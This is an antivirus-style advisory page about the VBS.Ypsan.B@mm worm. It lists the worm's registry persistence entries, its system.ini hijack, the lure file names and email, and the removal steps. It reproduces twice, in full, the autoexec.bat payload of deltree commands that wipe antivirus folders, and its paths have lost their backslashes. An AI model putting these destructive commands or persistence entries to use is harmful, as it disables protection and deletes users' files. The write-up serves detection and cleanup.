Ads

VBS.Ypsan.B@mm PDF Print E-mail
Tuesday, 05 April 2005
VBS.Ypsan.B@mm is a mass-mailing worm that also attempts to propagate through file-sharing networks.

Type: Worm

Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP

When VBS.Yspan.B@mm is executed, it performs the following actions:


Creates a folder named C:WINDOWSSystemBack ups.


Copies itself as the following:


C:WINDOWSSystemBack upsBkupinstall.vbs
C:WINDOWSSystemBack ups4-05-05.vbs


Adds the following line to the file C:windowssystem.ini:

shell= explorer.exe C:WINDOWSSystemBack upsBkupInstall.vbs


Adds the values:

"BootsCfg" = "wscript.exe C:WINDOWSSystemBack upsBkupinstall.vbs"
"Back Updates" = "wscript.exe C:WINDOWSSystemBack ups4-05-05.vbs"

to the registry subkey:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

so that the worm is executed every time Windows starts.


Adds the value:

"NoVirtMemPage" = "1"

to the registry subkey:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem


Adds the values:

"NoDeletePrinter" = "1"
"NoClose" = "1"

to the registry subkey:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer


Copies itself to the following folders, if they exist:


%ProgramFiles%KaZaA LiteMy Shared Folder
%ProgramFiles%KMDMy Shared Folder
%ProgramFiles%MorpheusMy Shared Folder
%ProgramFiles%BearShareShared
%ProgramFiles%Edonkey2000Incoming

using the following file names:


Porno-Pic.Jpg.vbs
girls.gif.vbs
sluts.gif.vbs
Sex-party.Gif.vbs
sluts girl.jpg.vbs

Note: %ProgramFiles% is a variable that refers to the program files folder. By default, this is C:Program Files.


Sends itself to all the contacts in the Windows Address Book using Microsoft Outlook. The email has the following characteristics:

Subject: Update today

Message:
The information that you asked for is,
This your friend john here is a free program so you can back up compters
file it does it every mouth. windows does it for you, but doesnt show you
and this program does it for you show you your files and you can back
them up.

Attachment: Bkupinstall.vbs


Attempts to overwrite C:autoexec.bat with the following lines in an attempt to disable or delete antivirus software:

@deltree/y c:antiba~1*.*
@deltree/y c:antiba~2*.*
@deltree/y c:antiba~1.1*.*
@deltree/y c:antiba~1.2*.*
@deltree/y c:antiba~1.3*.*
@deltree/y c:antiba~1.4*.*
@deltree/y c:antiba~1.5*.*
@deltree/y c:antiba~1.6*.*
@deltree/y c:antiba~1.7*.*
@deltree/y c:antiba~1.8*.*
@deltree/y c:antivi~1*.*
@deltree/y c:antivi~2*.*
@deltree/y c:antiviru*.*
@deltree/y c:avg*.*
@deltree/y c:avp*.*
@deltree/y c:avp30*.*
@deltree/y c:avx*.*
@deltree/y c:avpers~1*.*
@deltree/y c:itdef~1*.*
@deltree/y c:itdef~2*.*
@deltree/y c:comman~1*.*
@deltree/y c:cleancih*.*
@deltree/y c:esafen*.*
@deltree/y c:findvi~1*.*
@deltree/y c:f-macro*.*
@deltree/y c:f-prot*.*
@deltree/y c:f-prot95*.*
@deltree/y c:f-secu~1*.*
@deltree/y c:fwin*.*
@deltree/y c:fwin32*.*
@deltree/y c:inocul~1*.*
@deltree/y c:inocul~2*.*
@deltree/y c:kasper~1*.*
@deltree/y c:kasper~2*.*
@deltree/y c:mcafee*.*
@deltree/y c:mcafee~1*.*
@deltree/y c:msav*.*
@deltree/y c: orman*.*
@deltree/y c: orton~1*.*
@deltree/y c: orton~2*.*
@deltree/y c:pav*.*
@deltree/y c:pccill~1*.*
@deltree/y c:pc-cil~1*.*
@deltree/y c: av*.*
@deltree/y c:softwin*.*
@deltree/y c: bav*.*
@deltree/y c: bavw95*.*
@deltree/y c: oolkit*.*
@deltree/y c: rendm~1*.*
@deltree/y c: rex*.*
@deltree/y c:virus*.*
@deltree/y c:vpc*.*
@deltree/y c:vs95*.*
@deltree/y c:zonela~1*.*
@deltree/y c:zonela~2*.*
@deltree/y c:progra~1antiba~1*.*
@deltree/y c:progra~1antiba~2*.*
@deltree/y c:progra~1antiba~1.1*.*
@deltree/y c:progra~1antiba~1.2*.*
@deltree/y c:progra~1antiba~1.3*.*
@deltree/y c:progra~1antiba~1.4*.*
@deltree/y c:progra~1antiba~1.5*.*
@deltree/y c:progra~1antiba~1.6*.*
@deltree/y c:progra~1antiba~1.7*.*
@deltree/y c:progra~1antiba~1.8*.*
@deltree/y c:progra~1antivi~1*.*
@deltree/y c:progra~1antivi~2*.*
@deltree/y c:progra~1avg*.*
@deltree/y c:progra~1avp*.*
@deltree/y c:progra~1avx*.*
@deltree/y c:progra~1avx2000*.*
@deltree/y c:progra~1avpers~1*.*
@deltree/y c:progra~1itdef~1*.*
@deltree/y c:progra~1itdef~2*.*
@deltree/y c:progra~1comman~1*.*
@deltree/y c:progra~1common~1avpsha~1*.*
@deltree/y c:progra~1common~1symant~1*.*
@deltree/y c:progra~1datafe~1*.*
@deltree/y c:progra~1deerfi~1.com*.*
@deltree/y c:progra~1f-prot*.*
@deltree/y c:progra~1f-prot95*.*
@deltree/y c:progra~1findvi~1*.*
@deltree/y c:progra~1f-secu~1*.*
@deltree/y c:progra~1f-secure*.*
@deltree/y c:progra~1fsi*.*
@deltree/y c:progra~1fwin*.*
@deltree/y c:progra~1fwin32*.*
@deltree/y c:progra~1grisoft*.*
@deltree/y c:progra~1inocul~1*.*
@deltree/y c:progra~1inocul~2*.*
@deltree/y c:progra~1intern~2*.*
@deltree/y c:progra~1kasper~1*.*
@deltree/y c:progra~1kasper~2*.*
@deltree/y c:progra~1mcafee*.*
@deltree/y c:progra~1mcafee~1*.*
@deltree/y c:progra~1mindso~1*.*
@deltree/y c:progra~1 orman*.*
@deltree/y c:progra~1 orton~1*.*
@deltree/y c:progra~1 orton~2*.*
@deltree/y c:progra~1pandas~1*.*
@deltree/y c:progra~1protec~1*.*
@deltree/y c:progra~1protec~2*.*
@deltree/y c:progra~1quickh~1*.*
@deltree/y c:progra~1 av*.*
@deltree/y c:progra~1signal9*.*
@deltree/y c:progra~1softwin*.*
@deltree/y c:progra~1spysto~1*.*
@deltree/y c:progra~1symant~1*.*
@deltree/y c:progra~1 bav*.*
@deltree/y c:progra~1 inype~1*.*
@deltree/y c:progra~1 rendm~1*.*
@deltree/y c:progra~1 rendp~1*.*
@deltree/y c:progra~1 rojan~1*.*
@deltree/y c:progra~1 rojan~2*.*
@deltree/y c:progra~1virusm~1.0*.*
@deltree/y c:progra~1zonela~1*.*
@deltree/y c:progra~1zonela~2*.*


To delete the values from the registry
Click Start > Run.


Type regedit


Click OK.

Edit the System.ini file
If you are running Windows 95/98/Me, follow these steps:
Click Start > Run.
Type the following:

edit c:windowssystem.ini

and then click OK.

(The MS-DOS Editor opens.)

NOTE: If Windows is installed in a different location, make the appropriate path substitution.


In the [boot] section of the file, look for a line similar to:

shell= explorer.exe C:WINDOWSSystemBack upsBkupInstall.vbs


If this line exists, delete everything to the right of Explorer.exe.

When you are done, it should look like:

shell = Explorer.exe


Click File > Save.
Click File > Exit.

7. To edit the Autoexec.bat file
If you are running Windows 95/98/Me, follow these steps:

The function you perform depends on your operating system:
Windows 95/98: Go to step B.
Windows Me: If you are running Windows Me, the Windows Me file-protection process may have made a backup copy of the Autoexec.bat file that you need to edit. If this backup copy exists, it will be in the C:WindowsRecent folder. Symantec recommends that you delete this file before continuing with the steps in this section. To do this:
Start Windows Explorer.
Browse to and select the C:WindowsRecent folder.
In the right pane, select the Autoexec.bat file and delete it.


Click Start, and then click Run.
Type the following, and then click OK.

edit c:autoexec.bat

(The MS-DOS Editor opens.)


Delete the following lines:

@deltree/y c:antiba~1*.*
@deltree/y c:antiba~2*.*
@deltree/y c:antiba~1.1*.*
@deltree/y c:antiba~1.2*.*
@deltree/y c:antiba~1.3*.*
@deltree/y c:antiba~1.4*.*
@deltree/y c:antiba~1.5*.*
@deltree/y c:antiba~1.6*.*
@deltree/y c:antiba~1.7*.*
@deltree/y c:antiba~1.8*.*
@deltree/y c:antivi~1*.*
@deltree/y c:antivi~2*.*
@deltree/y c:antiviru*.*
@deltree/y c:avg*.*
@deltree/y c:avp*.*
@deltree/y c:avp30*.*
@deltree/y c:avx*.*
@deltree/y c:avpers~1*.*
@deltree/y c:itdef~1*.*
@deltree/y c:itdef~2*.*
@deltree/y c:comman~1*.*
@deltree/y c:cleancih*.*
@deltree/y c:esafen*.*
@deltree/y c:findvi~1*.*
@deltree/y c:f-macro*.*
@deltree/y c:f-prot*.*
@deltree/y c:f-prot95*.*
@deltree/y c:f-secu~1*.*
@deltree/y c:fwin*.*
@deltree/y c:fwin32*.*
@deltree/y c:inocul~1*.*
@deltree/y c:inocul~2*.*
@deltree/y c:kasper~1*.*
@deltree/y c:kasper~2*.*
@deltree/y c:mcafee*.*
@deltree/y c:mcafee~1*.*
@deltree/y c:msav*.*
@deltree/y c: orman*.*
@deltree/y c: orton~1*.*
@deltree/y c: orton~2*.*
@deltree/y c:pav*.*
@deltree/y c:pccill~1*.*
@deltree/y c:pc-cil~1*.*
@deltree/y c: av*.*
@deltree/y c:softwin*.*
@deltree/y c: bav*.*
@deltree/y c: bavw95*.*
@deltree/y c: oolkit*.*
@deltree/y c: rendm~1*.*
@deltree/y c: rex*.*
@deltree/y c:virus*.*
@deltree/y c:vpc*.*
@deltree/y c:vs95*.*
@deltree/y c:zonela~1*.*
@deltree/y c:zonela~2*.*
@deltree/y c:progra~1antiba~1*.*
@deltree/y c:progra~1antiba~2*.*
@deltree/y c:progra~1antiba~1.1*.*
@deltree/y c:progra~1antiba~1.2*.*
@deltree/y c:progra~1antiba~1.3*.*
@deltree/y c:progra~1antiba~1.4*.*
@deltree/y c:progra~1antiba~1.5*.*
@deltree/y c:progra~1antiba~1.6*.*
@deltree/y c:progra~1antiba~1.7*.*
@deltree/y c:progra~1antiba~1.8*.*
@deltree/y c:progra~1antivi~1*.*
@deltree/y c:progra~1antivi~2*.*
@deltree/y c:progra~1avg*.*
@deltree/y c:progra~1avp*.*
@deltree/y c:progra~1avx*.*
@deltree/y c:progra~1avx2000*.*
@deltree/y c:progra~1avpers~1*.*
@deltree/y c:progra~1itdef~1*.*
@deltree/y c:progra~1itdef~2*.*
@deltree/y c:progra~1comman~1*.*
@deltree/y c:progra~1common~1avpsha~1*.*
@deltree/y c:progra~1common~1symant~1*.*
@deltree/y c:progra~1datafe~1*.*
@deltree/y c:progra~1deerfi~1.com*.*
@deltree/y c:progra~1f-prot*.*
@deltree/y c:progra~1f-prot95*.*
@deltree/y c:progra~1findvi~1*.*
@deltree/y c:progra~1f-secu~1*.*
@deltree/y c:progra~1f-secure*.*
@deltree/y c:progra~1fsi*.*
@deltree/y c:progra~1fwin*.*
@deltree/y c:progra~1fwin32*.*
@deltree/y c:progra~1grisoft*.*
@deltree/y c:progra~1inocul~1*.*
@deltree/y c:progra~1inocul~2*.*
@deltree/y c:progra~1intern~2*.*
@deltree/y c:progra~1kasper~1*.*
@deltree/y c:progra~1kasper~2*.*
@deltree/y c:progra~1mcafee*.*
@deltree/y c:progra~1mcafee~1*.*
@deltree/y c:progra~1mindso~1*.*
@deltree/y c:progra~1 orman*.*
@deltree/y c:progra~1 orton~1*.*
@deltree/y c:progra~1 orton~2*.*
@deltree/y c:progra~1pandas~1*.*
@deltree/y c:progra~1protec~1*.*
@deltree/y c:progra~1protec~2*.*
@deltree/y c:progra~1quickh~1*.*
@deltree/y c:progra~1 av*.*
@deltree/y c:progra~1signal9*.*
@deltree/y c:progra~1softwin*.*
@deltree/y c:progra~1spysto~1*.*
@deltree/y c:progra~1symant~1*.*
@deltree/y c:progra~1 bav*.*
@deltree/y c:progra~1 inype~1*.*
@deltree/y c:progra~1 rendm~1*.*
@deltree/y c:progra~1 rendp~1*.*
@deltree/y c:progra~1 rojan~1*.*
@deltree/y c:progra~1 rojan~2*.*
@deltree/y c:progra~1virusm~1.0*.*
@deltree/y c:progra~1zonela~1*.*
@deltree/y c:progra~1zonela~2*.*

Click File, and then click Save.

Click File, and then click Exit.


Navigate to the subkey:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun


In the right pane, delete the value:

"BootsCfg" = "wscript.exe C:WINDOWSSystemBack upsBkupinstall.vbs"
"Back Updates" = "wscript.exe C:WINDOWSSystemBack ups4-05-05.vbs"


Navigate to the subkey:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem


In the right pane, reset the value:

"NoVirtMemPage" = "1"


Navigate to the subkey:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer

In the right pane, reset the values:

"NoDeletePrinter" = "1"
"NoClose" = "1"

Exit the Registry Editor.
 
< Prev   Next >
[ Back ]